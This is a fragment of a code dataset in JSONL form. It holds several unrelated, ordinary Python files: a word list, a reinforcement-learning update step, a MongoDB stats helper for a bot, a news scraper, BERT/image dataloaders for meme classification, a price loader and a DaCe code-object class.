\t\t\t'rickshaw',\n\t\t\t'rifleman',\n\t\t\t'rightful',\n\t\t\t'riposted',\n\t\t\t'roaching',\n\t\t\t'roasting',\n\t\t\t'robustly',\n\t\t\t'rockfish',\n\t\t\t'rockiest',\n\t\t\t'romanced',\n\t\t\t'romantic',\n\t\t\t'rondeaux',\n\t\t\t'rotundly',\n\t\t\t'roughest',\n\t\t\t'roundest',\n\t\t\t'roundish',\n\t\t\t'rousting',\n\t\t\t'rowdiest',\n\t\t\t'rowdyism',\n\t\t\t'royalism',\n\t\t\t'royalist',\n\t\t\t'rudiment',\n\t\t\t'rumbling',\n\t\t\t'ruminate',\n\t\t\t'rumpling',\n\t\t\t'rustical',\n\t\t\t'rustling',\n\t\t\t'sabering',\n\t\t\t'saboteur',\n\t\t\t'sacredly',\n\t\t\t'saintdom',\n\t\t\t'saliency',\n\t\t\t'salmonid',\n\t\t\t'saluting',\n\t\t\t'sampling',\n\t\t\t'sanctify',\n\t\t\t'sandwich',\n\t\t\t'sandwort',\n\t\t\t'saponify',\n\t\t\t'sardonic',\n\t\t\t'sardonyx',\n\t\t\t'sauteing',\n\t\t\t'savoring',\n\t\t\t'scalding',\n\t\t\t'scalping',\n\t\t\t'scamping',\n\t\t\t'scandium',\n\t\t\t'scantier',\n\t\t\t'scantily',\n\t\t\t'scarfing',\n\t\t\t'scathing',\n\t\t\t'scenario',\n\t\t\t'scheming',\n\t\t\t'schmaltz',\n\t\t\t'scolding',\n\t\t\t'scornful',\n\t\t\t'scourged',\n\t\t\t'scouring',\n\t\t\t'scouting',\n\t\t\t'scowling',\n\t\t\t'scramble',\n\t\t\t'scraping',\n\t\t\t'scrawled',\n\t\t\t'screwing',\n\t\t\t'scrimped',\n\t\t\t'scripted',\n\t\t\t'scrofula',\n\t\t\t'scrounge',\n\t\t\t'scrupled',\n\t\t\t'scrutiny',\n\t\t\t'sculpted',\n\t\t\t'sculptor',\n\t\t\t'scurvily',\n\t\t\t'scything',\n\t\t\t'seafront',\n\t\t\t'seamount',\n\t\t\t'secantly',\n\t\t\t'secondly',\n\t\t\t'sectoral',\n\t\t\t'securing',\n\t\t\t'security',\n\t\t\t'sedating',\n\t\t\t'sedation',\n\t\t\t'seducing',\n\t\t\t'sedulity',\n\t\t\t'seignory',\n\t\t\t'semantic',\n\t\t\t'seminary',\n\t\t\t'semolina',\n\t\t\t'seraglio',\n\t\t\t'seraphic',\n\t\t\t'seraphim',\n\t\t\t'shackled',\n\t\t\t'shadblow',\n\t\t\t'shadower',\n\t\t\t'shafting',\n\t\t\t'shambled',\n\t\t\t'shameful',\n\t\t\t'shamrock',\n\t\t\t'sharking',\n\t\t\t'sharping',\n\t\t\t'shearing',\n\t\t\t'sheaving',\n\t\t\t'sheikdom',\n\t\t\t'shelduck',\n\t\t\t'shelving',\n\t\t\t'sherlock',\n\t\t\t'shingled',\n\t\t\t'shipload',\n\t\t\t'shipmate',\n\t\t\t'shipment',\n\t\t\t'shipworm',\n\t\t\t'shipyard',\n\t\t\t'shocking',\n\t\t\t'shortage',\n\t\t\t'shorting',\n\t\t\t'shoulder',\n\t\t\t'
shouting',\n\t\t\t'showgirl',\n\t\t\t'shrapnel',\n\t\t\t'shrewdly',\n\t\t\t'shrimped',\n\t\t\t'shucking',\n\t\t\t'shutdown',\n\t\t\t'sidelong',\n\t\t\t'sidewalk',\n\t\t\t'signaled',\n\t\t\t'signaler',\n\t\t\t'silkworm',\n\t\t\t'simulate',\n\t\t\t'singable',\n\t\t\t'singular',\n\t\t\t'sinkhole',\n\t\t\t'siphoned',\n\t\t\t'skewbald',\n\t\t\t'skinhead',\n\t\t\t'skydiver',\n\t\t\t'skylight',\n\t\t\t'slacking',\n\t\t\t'slangier',\n\t\t\t'slighted',\n\t\t\t'slighter',\n\t\t\t'slipknot',\n\t\t\t'slithery',\n\t\t\t'slouched',\n\t\t\t'sloughed',\n\t\t\t'sludgier',\n\t\t\t'slumbery',\n\t\t\t'slumping',\n\t\t\t'slurping',\n\t\t\t'smacking',\n\t\t\t'smarting',\n\t\t\t'smearing',\n\t\t\t'smelting',\n\t\t\t'smidgeon',\n\t\t\t'smirched',\n\t\t\t'smocking',\n\t\t\t'smoulder',\n\t\t\t'smudgier',\n\t\t\t'smudgily',\n\t\t\t'snatched',\n\t\t\t'snatcher',\n\t\t\t'sneakily',\n\t\t\t'snowbird',\n\t\t\t'sobering',\n\t\t\t'sobriety',\n\t\t\t'sociable',\n\t\t\t'sociably',\n\t\t\t'societal',\n\t\t\t'sodality',\n\t\t\t'softback',\n\t\t\t'software',\n\t\t\t'solacing',\n\t\t\t'solarium',\n\t\t\t'soldiery',\n\t\t\t'solitary',\n\t\t\t'solitude',\n\t\t\t'solvated',\n\t\t\t'solvency',\n\t\t\t'sombrely',\n\t\t\t'somewhat',\n\t\t\t'songbird',\n\t\t\t'songlike',\n\t\t\t'sourcing',\n\t\t\t'southern',\n\t\t\t'southpaw',\n\t\t\t'souvenir',\n\t\t\t'souvlaki',\n\t\t\t'sowbread',\n\t\t\t'spadeful',\n\t\t\t'spangled',\n\t\t\t'sparking',\n\t\t\t'sparkled',\n\t\t\t'spavined',\n\t\t\t'speaking',\n\t\t\t'spearing',\n\t\t\t'specking',\n\t\t\t'spectral',\n\t\t\t'spectrum',\n\t\t\t'specular',\n\t\t\t'sphagnum',\n\t\t\t'sphenoid',\n\t\t\t'sphering',\n\t\t\t'spheroid',\n\t\t\t'spicular',\n\t\t\t'spiracle',\n\t\t\t'spiteful',\n\t\t\t'splaying',\n\t\t\t'splendor',\n\t\t\t'splinted',\n\t\t\t'splinter',\n\t\t\t'splotchy',\n\t\t\t'splurged',\n\t\t\t'spoilage',\n\t\t\t'spondaic',\n\t\t\t'spongier',\n\t\t\t'spongily',\n\t\t\t'sporadic',\n\t\t\t'sportily',\n\t\t\t'sporting',\n\t\t\t'sportive',\n\t\t\t'spouting',\n\t\t\t'sprained',\n\t\t\t'sprawled',\n\t\t\t'spraying',\n\t\t\t'sprinkle',\n\t\t\t'sprinted',\n\t\t\t'sprocket',\n\t\t\t'sprouted',\n\t\t\t'sprucely',\n\t\t\t'sprucing',\n\t\t\t'spunkier',\n\t\t\t'spurting',\n\t\t\t'squadron',\n\t\t\t'squander',\n\t\t\t'squarely',\n\t\t\t'squaring',\n\t\t\t'squawked',\n\t\t\t'squawker',\n\t\t\t'squinted',\n\t\t\t'squinter',\n\t\t\t'squirmed',\n\t\t\t'squirted',\n\t\t\t'stabling',\n\t\t\t'stacking',\n\t\t\t'stalking',\n\t\t\t'stamping',\n\t\t\t'stanched',\n\t\t\t'stanchly',\n\t\t\t'stapling',\n\t\t\t'starched',\n\t\t\t'starlike',\n\t\t\t'starling',\n\t\t\t'starving',\n\t\t\t'steadily',\n\t\t\t'steading',\n\t\t\t'stealing',\n\t\t\t'steamily',\n\t\t\t'steaming',\n\t\t\t'sterling',\n\t\t\t'stickler',\n\t\t\t'stockade',\n\t\t\t'stockier',\n\t\t\t'stockily',\n\t\t\t'stocking',\n\t\t\t'stockman',\n\t\t\t'stockmen',\n\t\t\t'stodgier',\n\t\t\t'stodgily',\n\t\t\t'stomping',\n\t\t\t'stonefly',\n\t\t\t'storable',\n\t\t\t'stormily',\n\t\t\t'storming',\n\t\t\t'strafing',\n\t\t\t'strained',\n\t\t\t'strangle',\n\t\t\t'strawing',\n\t\t\t'straying',\n\t\t\t'strewing',\n\t\t\t'stricken',\n\t\t\t'strickle',\n\t\t\t'stringed',\n\t\t\t'strobila',\n\t\t\t'strobile',\n\t\t\t'stroking',\n\t\t\t'strongly',\n\t\t\t'strophic',\n\t\t\t'studying',\n\t\t\t'stumbled',\n\t\t\t'stumbler',\n\t\t\t'stumpier',\n\t\t\t'stumping',\n\t\t\t'stupider',\n\t\t\t'stupidly',\n\t\t\t'sturdily',\n\t\t\t'sturgeon',\n\t\t\t'stylized',\n\t\t\t'subagent',\n\t\t\t'sublimed',\n\t\t\t'suborned',\n\t\t\t'subpoena',\n\t\t\t'subpolar',\n\t\t\t'subtonic',\n\t\t\t'su
btopia',\n\t\t\t'suchlike',\n\t\t\t'suckling',\n\t\t\t'suitable',\n\t\t\t'suitably',\n\t\t\t'sulfated',\n\t\t\t'sulphate',\n\t\t\t'sulphide',\n\t\t\t'sunbaked',\n\t\t\t'sunbathe',\n\t\t\t'sunlight',\n\t\t\t'superbly',\n\t\t\t'superman',\n\t\t\t'supernal',\n\t\t\t'supertax',\n\t\t\t'supinate',\n\t\t\t'supinely',\n\t\t\t'surfaced',\n\t\t\t'surgical',\n\t\t\t'suricate',\n\t\t\t'surnamed',\n\t\t\t'surplice',\n\t\t\t'suzerain',\n\t\t\t'swampier',\n\t\t\t'swamping',\n\t\t\t'swankier',\n\t\t\t'swanlike',\n\t\t\t'swarming',\n\t\t\t'swathing',\n\t\t\t'swearing',\n\t\t\t'sweating',\n\t\t\t'swerving',\n\t\t\t'swindler',\n\t\t\t'swingled',\n\t\t\t'switched',\n\t\t\t'sybarite',\n\t\t\t'sycamore',\n\t\t\t'syconium',\n\t\t\t'symbolic',\n\t\t\t'synaptic',\n\t\t\t'syndetic',\n\t\t\t'syndrome',\n\t\t\t'synoptic',\n\t\t\t'syphoned',\n\t\t\t'syringed',\n\t\t\t'tailored',\n\t\t\t'thankful',\n\t\t\t'thousand',\n\t\t\t'tribunal',\n\t\t\t'underway',\n\t\t\t'velocity',\n\t\t\t'vineyard',\n\t\t\t'visceral',\n\t\t\t'vocalist',\n\t\t\t'weaponry',\n\t\t\t'yourself']\n\t\t\t","sub_path":"wordlist.py","file_name":"wordlist.py","file_ext":"py","file_size_in_byte":14662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"439371243","text":"import torch\nimport numpy as np\n\ndef flat(grads):\n flat_grads = []\n for grad in grads:\n flat_grads.append(grad.view(-1))\n flat_grads = torch.cat(flat_grads)\n return flat_grads\n\n\ndef get_flat_params_from(model):\n params = []\n for param in model.parameters():\n params.append(param.data.view(-1))\n\n flat_params = torch.cat(params)\n return flat_params\n\n\ndef set_flat_params_to(model, flat_params):\n prev_ind = 0\n for param in model.parameters():\n flat_size = int(np.prod(list(param.size())))\n param.data.copy_(\n flat_params[prev_ind:prev_ind + flat_size].view(param.size()))\n prev_ind += flat_size\n\n\ndef get_update_direction_with_lo(grad_flat, current_net, lo):\n directions = []\n prev_ind = 0\n for param in current_net.parameters():\n flat_size = int(np.prod(list(param.size())))\n ndarray = grad_flat[prev_ind:prev_ind + flat_size].view(param.size()).detach()\n if ndarray.dim() > 1: # inter-layer parameters\n ndarray = ndarray.numpy()\n direction_layer = lo.lo_oracle(-ndarray)\n direction_layer = torch.from_numpy(direction_layer).view(-1)\n direction_layer = param.view(-1) - direction_layer.double()\n else: # parameters of activation functions\n direction_layer = -ndarray\n directions.append(direction_layer)\n prev_ind += flat_size\n direction = torch.cat(directions)\n # print(torch.norm(-grad_flat - direction))\n return direction\n\n\ndef a2c_scg_fw_step(policy_net, value_net, optimizer_policy, optimizer_value, states, actions, returns, advantages, l2_reg, prev_grad, d_theta, i_iter, lo):\n\n \"\"\"update critic\"\"\"\n values_pred = value_net(states)\n value_loss = (values_pred - returns).pow(2).mean()\n # weight decay\n for param in value_net.parameters():\n value_loss += param.pow(2).sum() * l2_reg\n optimizer_value.zero_grad()\n value_loss.backward()\n optimizer_value.step()\n\n \"\"\"update policy\"\"\"\n learning_rate = 3e-2\n alpha = 1/(i_iter+2)**(2/3)\n # alpha = 1\n log_probs = policy_net.get_log_prob(states, actions)\n probs = torch.exp(log_probs)\n dice = probs/probs.detach()\n policy_loss = -(dice * advantages).mean()\n grad = torch.autograd.grad(policy_loss, policy_net.parameters(), retain_graph=True, create_graph=True)\n # torch.nn.utils.clip_grad_norm_(policy_net.parameters(), 40)\n grad_flat_current 
= flat(grad)\n\n grad_flat = (1-alpha) * prev_grad + alpha * grad_flat_current\n # direction = grad_flat/torch.norm(grad_flat)\n direction = get_update_direction_with_lo(grad_flat, policy_net, lo)\n # direction = grad_flat\n prev_params = get_flat_params_from(policy_net)\n updated_params = prev_params - learning_rate * direction\n set_flat_params_to(policy_net, updated_params)\n d_theta = updated_params - prev_params\n\n return grad_flat.detach(), d_theta.detach()\n\n","sub_path":"core/a2c_scg_fw.py","file_name":"a2c_scg_fw.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"161038937","text":"from pymongo import MongoClient\nimport datetime\nimport pandas as pd\nimport json\n\nclass DataBase:\n def __init__(self):\n with open('tokens.json') as json_file:\n data = json.load(json_file)\n self.client = MongoClient(data[\"database\"])\n self.users = self.client.heroku_2d7ckb75.users\n self.logs = self.client.heroku_2d7ckb75.logs\n self.stats = self.client.heroku_2d7ckb75.server_stats\n\n def update_messages(self, user, msgs=1):\n try:\n id = self.get_usr(self.users, user)[\"_id\"]\n except:\n id = None\n old, date = self.get_msgs(user)\n if id is not None:\n self.users.find_one_and_update({\"_id\":id}, {\"$set\":{\"messages\": old + msgs}})\n else:\n self.create_new_messages(user, 1)\n\n def get_msgs(self, usr):\n try:\n u = self.get_usr(self.users, usr)\n return u[\"messages\"], u[\"joined\"]\n except:\n return 0, self.get_date()\n\n def create_new_messages(self, user, msgs=0):\n usr = {\"user\": str(user), \"messages\": msgs, \"joined\":DataBase.get_date()}\n id = self.users.insert_one(usr).inserted_id\n return id\n\n def get_usr(self, db, user):\n found = db.find_one({\"user\":str(user)})\n return found\n\n def update_server_stats(self,usr=0):\n try:\n if usr == 1:\n old = self.stats.find_one({\"date\": DataBase.get_date()})[\"newUsers\"]\n self.stats.find_one_and_update({\"date\": DataBase.get_date()}, {\"$set\": {\"newUsers\": old + 1}})\n else:\n old = self.stats.find_one({\"date\":DataBase.get_date()})[\"messages\"]\n self.stats.find_one_and_update({\"date\": DataBase.get_date()}, {\"$set\": {\"messages\": old + 1}})\n except:\n stat = {\"date\": DataBase.get_date(), \"messages\": 1, \"newUsers\": 0}\n id = self.stats.insert_one(stat).inserted_id\n\n def get_top_users(self):\n query = self.users.find({})\n top = 0\n users = []\n for doc in query:\n if doc[\"messages\"] > top:\n top = doc[\"messages\"]\n users = [doc[\"user\"]]\n elif doc[\"messages\"] == top:\n users.append(doc[\"user\"])\n\n return users, top\n\n def get_all_messages(self):\n query = self.stats.find({})\n sum = 0\n l = 0\n for doc in query:\n l += 1\n sum += doc[\"messages\"]\n\n return sum, l\n\n def scoreboard(self):\n query = self.users.find({})\n usrs = []\n for doc in query:\n msg = int(doc[\"messages\"])\n usrs.append([doc[\"user\"], msg])\n usrs.sort(key=lambda x: x[1])\n usrs = usrs[-5:]\n\n df = pd.DataFrame(usrs, columns=[\"user\", \"messages\"])\n d = df[[\"user\", \"messages\"]]\n d = d.sort_values(by=['messages'], ascending=False)\n return str(d.head().to_string(index=False))\n\n @staticmethod\n def get_date():\n return str(datetime.datetime.now()).split(\" \")[0]\n\n def add_rep(self, user):\n try:\n id = self.get_usr(self.users, user)[\"_id\"]\n except:\n id = None\n old, date = self.get_rep(user)\n if id is not None:\n self.users.update_one({\"_id\":id}, {\"$set\":{\"reps\": old + 1}})\n 
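# also record when this rep was given; get_rep returns it alongside the count\n            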
self.users.update_one({\"_id\": id}, {\"$set\": {\"last_rep\": self.get_date()}})\n\n    def get_rep(self, usr):\n        try:\n            u = self.get_usr(self.users, str(usr))\n            return u[\"reps\"], u[\"last_rep\"]\n        except Exception as e:\n            print(e)\n            return 0, None\n\n    def rep_scoreboard(self):\n        query = self.users.find({})\n        usrs = []\n        for doc in query:\n            try:\n                rep = int(doc[\"reps\"])\n                usrs.append([doc[\"user\"], rep])\n            except:\n                pass\n        usrs.sort(key=lambda x: x[1])\n        usrs = usrs[-5:]\n\n        df = pd.DataFrame(usrs, columns=[\"user\", \"reps\"])\n        d = df[[\"user\", \"reps\"]]\n        d = d.sort_values(by=['reps'], ascending=False)\n        return str(d.head().to_string(index=False))\n","sub_path":"cogs/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"192108259","text":"from scrapy.selector import Selector\nfrom app.ext.utils.Performance import Performance\nfrom app.crawler.utils.kr.news import CoronaNewsCrawler\nfrom app.crawler.utils.ext import cleanText, NewsNogadaJsonData\n\n\nclass KrNewsParser:\n    def __init__(self):\n        self.loop = Performance()\n        self.data = CoronaNewsCrawler()\n\n    async def query(self):\n        soup = await self.data.Request()\n        a = await self.loop.run_in_threadpool(lambda: Selector(text=soup))\n        description = await self.loop.run_in_threadpool(\n            lambda: a.css(\"#main_pack > div.news.mynews.section._prs_nws > ul > li > dl\"))\n        __press = await self.loop.run_in_threadpool(lambda: description.css(\"dt > a\"))\n        __title = await self.loop.run_in_threadpool(lambda: description.css(\"dd > span._sp_each_source\"))\n        __summary = await self.loop.run_in_threadpool(lambda: description.css(\"dd:nth-child(3)\"))\n        __link = await self.loop.run_in_threadpool(lambda: description.css('dt > a'))\n        _link = await self.loop.run_in_threadpool(lambda: __link.xpath(\"@href\"))\n        _press = await self.loop.run_in_threadpool(lambda: __press.getall())\n        _title = await self.loop.run_in_threadpool(lambda: __title.getall())\n        _summary = await self.loop.run_in_threadpool(lambda: __summary.getall())\n        link = await self.loop.run_in_threadpool(lambda: _link.getall())\n        press = []\n        for i in _press:\n            ___press = await cleanText(i)\n            press.append(___press)\n        title = []\n        for i in _title:\n            ___title = await cleanText(i)\n            title.append(___title.replace(\"선정\", \"\").replace(\"언론사\", \"\"))\n        summary = []\n        for i in _summary:\n            ___summary = await cleanText(i)\n            summary.append(___summary)\n        jsondata = await NewsNogadaJsonData(a=title, b=press, c=summary, d=link)\n        return jsondata\n","sub_path":"app/crawler/kr/krnews.py","file_name":"krnews.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"385536707","text":"import numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, Dataset, TensorDataset\nfrom torch.utils import data\nfrom torchvision import transforms, datasets, models\nfrom PIL import Image\n\n\n'''\nLoad the BERT tokenizer.\n'''\nfrom transformers import BertTokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n\n\n\n'''\nDataloader for Training/Validation\nReturns (Image, Caption, Input_id, Attention_mask, label)\n'''\nclass mydataset(): \n\n    def __init__(self, classification_list, name):\n\n        super().__init__()\n        \n        self.X = []\n        self.Cap = []\n        self.Y = []\n        \n        with open(classification_list, mode = 'r') as f:\n            \n            for line in f:\n                path, 
caption, label = line[:-1].split('\\t')\n\n                self.X.append('/home/ironman/abhishek/GBM/FB/Code/data/'+path)\n                self.Cap.append(caption)\n                self.Y.append(label)\n        \n        '''\n        Tokenize all of the captions and map the tokens to their word IDs, and get respective attention masks.\n        '''\n        self.input_ids, self.attention_masks = tokenize(self.Cap)\n        \n        \n        \n        '''\n        Image Transforms\n        '''\n        \n        if name in ['valid','test']:\n            self.transform = transforms.Compose([ transforms.Resize(384),\n                                             transforms.CenterCrop(256),\n                                             transforms.ToTensor(),\n                                             transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                                                  std=[0.229, 0.224, 0.225])\n                                            ])\n        else:\n            self.transform = transforms.Compose([ transforms.Resize(256),\n                                             transforms.RandomCrop(224),\n                                             transforms.RandomHorizontalFlip(),\n                                             transforms.ToTensor(),\n                                             transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                                                  std=[0.229, 0.224, 0.225])\n                                            ])\n        \n        \n    def __getitem__(self,index):\n        \n        \n        '''\n        For Image and Label\n        '''\n        image = self.X[index]\n        \n        image = (Image.open(image))\n        \n        image = self.transform(image)\n        \n        label = float(self.Y[index])\n\n        \n        '''\n        For Captions, Input ids and Attention mask\n        '''\n        caption = self.Cap[index]\n        input_id = self.input_ids[index]\n        attention_masks = self.attention_masks[index]\n        \n        return image, caption, input_id, attention_masks, torch.as_tensor(label).long()\n        \n        \n    def __len__(self):\n        return len(self.X)\n    \n    \n    \n    \n    \n    \n    \n    \n'''\ntokenize all of the sentences and map the tokens to their word IDs.\n'''\n\ndef tokenize(sequences):\n    \n    input_ids = []\n    attention_masks = []\n\n    # For every caption...\n    for seq in sequences:\n        '''\n        `encode_plus` will:\n        (1) Tokenize the caption.\n        (2) Prepend the `[CLS]` token to the start.\n        (3) Append the `[SEP]` token to the end.\n        (4) Map tokens to their IDs.\n        (5) Pad or truncate the sentence to `max_length`\n        (6) Create attention masks for [PAD] tokens.\n        '''\n        encoded_dict = tokenizer.encode_plus(\n                            seq,                      # Sentence to encode.\n                            add_special_tokens = True, # Add '[CLS]' and '[SEP]'\n                            max_length = 48,           # Pad & truncate all sentences.\n                            truncation=True,\n                            pad_to_max_length = True,\n                            return_attention_mask = True,   # Construct attn. masks.\n                            return_tensors = 'pt',     # Return pytorch tensors.\n                       )\n\n        # Add the encoded sentence to the list. 
\n        input_ids.append(encoded_dict['input_ids'])\n\n        # And its attention mask (simply differentiates padding from non-padding).\n        attention_masks.append(encoded_dict['attention_mask'])\n\n    # Convert the lists into tensors.\n    input_ids = torch.cat(input_ids, dim=0)\n    attention_masks = torch.cat(attention_masks, dim=0)\n    \n    \n    return input_ids, attention_masks\n\n\n'''\nToy example explaining the working of tokenize function and max_len=48\n\nOriginal Caption: \na phobia is an irrational fear a fear that muslims may be terrorists is not islamaophobia but a fear grounded in history, experience, and reality\n\nToken IDs: tensor([ 101, 1037, 6887, 16429, 2401, 2003, 2019, 23179, 3571, 1037,\n         3571, 2008, 7486, 2089, 2022, 15554, 2003, 2025, 7025, 7113,\n         24920, 2021, 1037, 3571, 16764, 1999, 2381, 1010, 3325, 1010,\n         1998, 4507, 102, 0, 0, 0, 0, 0, 0, 0,\n         0, 0, 0, 0, 0, 0, 0, 0])\n \nAttention masks: tensor([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,\n        1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n'''\n\n\n\n\n\n'''\nDataloader for creating predictions.csv\nReturns (Image, Captions, Input_id, Attention_mask and ImageName)\n'''\nclass mytestdataset(): \n\n    def __init__(self, classification_list, name):\n\n        super().__init__()\n        \n        self.X = []\n        self.Cap = []\n        self.Imagename = []\n        \n        with open(classification_list, mode = 'r') as f:\n            \n            for line in f:\n                path, caption = line[:-1].split('\\t')\n\n                self.X.append('/home/ironman/abhishek/GBM/FB/Code/data/'+path)\n                self.Cap.append(caption)\n                self.Imagename.append(path.split('/')[1][:-4])\n        \n        \n        '''\n        Tokenize all of the captions and map the tokens to their word IDs, and get respective attention masks.\n        '''\n        self.input_ids, self.attention_masks = tokenize(self.Cap)\n        \n        \n        \n        '''\n        Image Transforms\n        '''\n        self.transform = transforms.Compose([ transforms.Resize(256),\n                                         transforms.CenterCrop(224),\n                                         transforms.ToTensor(),\n                                         transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                                              std=[0.229, 0.224, 0.225])\n                                        ])\n    \n    \n    def __getitem__(self,index):\n        \n        \n        '''\n        Image\n        '''\n        image = self.X[index]\n        \n        image = (Image.open(image))\n        \n        image = self.transform(image)\n        \n        \n        '''\n        For Captions, Input ids, Attention mask and Imagename\n        '''\n        caption = self.Cap[index]\n        input_id = self.input_ids[index]\n        attention_masks = self.attention_masks[index]\n        Imagename = self.Imagename[index]\n        \n        return image, caption, input_id, attention_masks, Imagename\n    \n    \n    def __len__(self):\n        return len(self.X)\n    \n\n\n\n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n'''\nDataloader for Training/Validation with support for Image Captioning model\nReturns (Image, Caption, Input_id, Attention_mask, Input_id_Captioning_model, Attention_mask_Captioning_model, label)\n'''\nclass mydataset_captioning(): \n\n    def __init__(self, classification_list, name):\n\n        super().__init__()\n        \n        self.X = []\n        self.true_Cap = []\n        self.generated_Cap = []\n        self.Y = []\n        \n        with open(classification_list, mode = 'r') as f:\n\n            for line in f:\n                \n                path, caption, generated_caption, label = line[:-1].split('\\t')\n\n                self.X.append('/home/ironman/abhishek/GBM/FB/Code/data/'+path)\n                self.true_Cap.append(caption)\n                self.generated_Cap.append(generated_caption)\n                self.Y.append(label)\n        \n        '''\n        Tokenize all of the captions and map the tokens to their word IDs, and get respective attention masks.\n        '''\n        self.input_ids, self.attention_masks = tokenize(self.true_Cap)\n        \n        self.input_ids_cap, self.attention_masks_cap = 
tokenize(self.generated_Cap)\n \n \n \n '''\n Image Transforms\n '''\n \n if name in ['valid','test']:\n self.transform = transforms.Compose([ transforms.Resize(384),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n else:\n self.transform = transforms.Compose([ transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n \n \n def __getitem__(self,index):\n \n \n '''\n For Image and Label\n '''\n image = self.X[index]\n \n image = (Image.open(image))\n \n image = self.transform(image)\n \n label = float(self.Y[index])\n\n \n '''\n For Captions, Input ids and Attention mask\n '''\n caption = self.true_Cap[index]\n input_id = self.input_ids[index]\n attention_masks = self.attention_masks[index]\n \n input_id_cap = self.input_ids_cap[index]\n attention_masks_cap = self.attention_masks_cap[index]\n \n \n \n return image, caption, input_id, attention_masks, input_id_cap, attention_masks_cap, torch.as_tensor(label).long()\n \n \n def __len__(self):\n return len(self.X)\n \n","sub_path":"Code/Dataloaders/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":10844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388074209","text":"from datetime import date\nimport os\nimport csv\n\n__author__ = 'matt'\n\n\n# def load_dir(dir):\n# rows = []\n# for subdir, dirs, files in os.walk(dir):\n# for file in files:\n# with open(dir + '\\\\' + file) as f:\n# reader = csv.reader(f)\n# for row in reader:\n# rows.append(row)\n#\n# return rows\n\n\nclass Fetcher:\n\n def __init__(self):\n self.prices = {}\n # self.load()\n\n def load_company(self, code):\n\n company_prices = self.prices.get(code)\n if not company_prices:\n company_prices = {}\n self.prices[code] = company_prices\n\n try:\n # Date,Open,High,Low,Close,Volume,Adj Close\n with open('../data/yahoo/latest/' + code + '-price-history.csv') as f:\n reader = csv.reader(f)\n for row in reader:\n if row[0] == 'Date':\n continue\n price = float(row[6])\n d = row[0].split('-')\n company_prices[date(int(d[0]), int(d[1]), int(d[2]))] = price\n except FileNotFoundError:\n pass\n\n def load(self):\n\n with open('input/prices-2014-06-30.xml') as f:\n for line in f:\n a = line.replace('', '')\n a = a.replace('', '')\n a = a.replace('', '')\n a = a.replace('', '')\n a = a.replace('.AX', '')\n a = a.replace('/', '')\n a = a.replace('\\n', '')\n\n if len(a) > 0:\n e = a.split(',')\n code = e[0]\n year = int(e[1])\n price = float(e[2])\n company_prices = self.prices.get(code)\n if not company_prices:\n company_prices = {}\n self.prices[code] = company_prices\n company_prices[year] = price\n","sub_path":"python/mjc/prices.py","file_name":"prices.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"530039129","text":"import ctypes\nimport numpy as np\n\nfrom dace import symbolic, types\nfrom dace.config import Config\nfrom dace.frontend import operations\nfrom dace.properties import Property, make_properties\nfrom dace.codegen.targets.target import TargetCodeGenerator\n\nfrom dace.codegen.instrumentation.perfsettings import PerfMetaInfo\n\n\n@make_properties\nclass CodeObject(object):\n name = Property(dtype=str, desc=\"Filename to use\")\n code = Property(dtype=str, 
desc=\"The code attached to this object\")\n    perf_meta_info = Property(\n        dtype=PerfMetaInfo, desc=\"Meta information used to map nodes to LOC\")\n    language = Property(\n        dtype=str,\n        desc=\"Language used for this code (same \" +\n        \"as its file extension)\")  # dtype=types.Language?\n    target = Property(dtype=type, desc=\"Target to use for compilation\")\n    title = Property(dtype=str, desc=\"Title of code for GUI\")\n    extra_compiler_kwargs = Property(\n        dtype=dict,\n        desc=\"Additional compiler argument \"\n        \"variables to add to template\")\n    linkable = Property(\n        dtype=bool, desc='Should this file participate in '\n        'overall linkage?')\n\n    def __init__(self,\n                 name,\n                 code,\n                 language,\n                 target,\n                 title,\n                 additional_compiler_kwargs={},\n                 linkable=True,\n                 meta_info=PerfMetaInfo()):\n        super(CodeObject, self).__init__()\n\n        self.name = name\n        self.code = code\n        self.language = language\n        self.target = target\n        self.title = title\n        self.extra_compiler_kwargs = additional_compiler_kwargs\n        self.linkable = linkable\n        self.perf_meta_info = meta_info\n","sub_path":"dace/codegen/codeobject.py","file_name":"codeobject.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
